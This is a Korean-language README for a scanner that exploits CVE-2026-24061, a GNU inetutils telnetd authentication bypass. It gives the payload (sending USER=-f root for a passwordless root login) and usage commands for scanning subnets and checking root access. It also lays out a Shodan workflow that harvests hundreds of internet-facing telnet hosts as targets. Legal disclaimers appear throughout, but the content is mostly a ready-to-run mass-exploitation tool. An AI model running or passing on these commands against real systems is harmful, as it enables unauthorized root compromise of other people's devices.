
CVE-2026-24061 telnetd 인증 우회를 스캔하여, 취약한 GNU inetutils telnetd 장치에서 페이로드를 생성하고 루트 접근 권한을 검증합니다.
⚠️ 매우 중요한 법적 고지 ⚠️
이 도구는 교육 목적, 보안 연구, 취약점 분석 및 승인된 테스트 전용입니다.
USER=-f root(또는 변형) 전송 시 비밀번호 없이 즉시 root로 로그인 가능이 스캐너는 Hakai Security 팀이 공개한 훌륭한 기술 분석과 개념 증명 덕분에 가능했습니다.
그들의 상세한 기사는 공격 벡터, 실제 페이로드 및 취약한 telnetd의 동작에 대한 정확한 기술적 기반을 제공했습니다.
→ 전체 분석은 여기에서 읽으세요:
https://hakaisecurity.io/cve-2026-24061-execucao-remota-de-codigo-no-telnetd-analise-tecnica-e-prova-de-conceito/research-blog/
Hakai Security에 진심으로 감사드립니다 — 투명성, 기술적 우수성, 그리고 보안 커뮤니티에 대한 기여 덕분에 이 도구가 더 정확하고 책임 있는 연구에 유용해졌습니다.
--users를 통한 사용자 목록 커스터마이징 (기본값: root, admin, pi, ubuntu, debian 등 포함)id 및 whoami를 통한 실제 root 확인 (--verify)-w로 조정 가능)# 권장: virtualenv 사용
python3 -m venv venv-cve
source venv-cve/bin/activate
# 의존성 설치
pip install telnetlib3 colorama
python3 scan-cve-2026-24061.py 192.168.1.0/24 --verify --banner -w 50
# 대상 목록 사용 (예: Shodan)
python3 scan-cve-2026-24061.py alvos.txt -w 80 -t 6 --users root admin -o resultados.json
# root에 집중 (더 빠름)
python3 scan-cve-2026-24061.py 10.0.0.0/24 --users root --verify --banner -t 5
# Dry-run (IP 목록만 출력)
python3 scan-cve-2026-24061.py 206.42.41.0/24 --dry-run
pip install shodan
# API 키로 초기화
shodan init SUA_API_KEY_AQUI
# 잠재적 대상 다운로드
shodan download --limit 500 iot-gnu-telnet.json.gz 'port:23 ("GNU inetutils" OR "telnetd (GNU inetutils)") -ssh'
# IP 추출
shodan parse --fields ip_str iot-gnu-telnet.json.gz > alvos.txt
# 스캔
python3 scan-cve-2026-24061.py alvos.txt --verify --banner
윤리적 초점을 유지하고 책임 고지를 강화하는 한 Pull Request를 환영합니다. 라이선스 MIT License – 단, 다시 강조합니다: 비승인 사용에 대한 책임은 전적으로 사용자에게 있습니다. 학습, 인식 제고 및 보안 연구를 위해 제작되었습니다.
⭐ 유용했다면 스타를 남겨주세요!
🛡️ 극도로 책임감 있게 사용하십시오.
Made with ❤️ by killsystema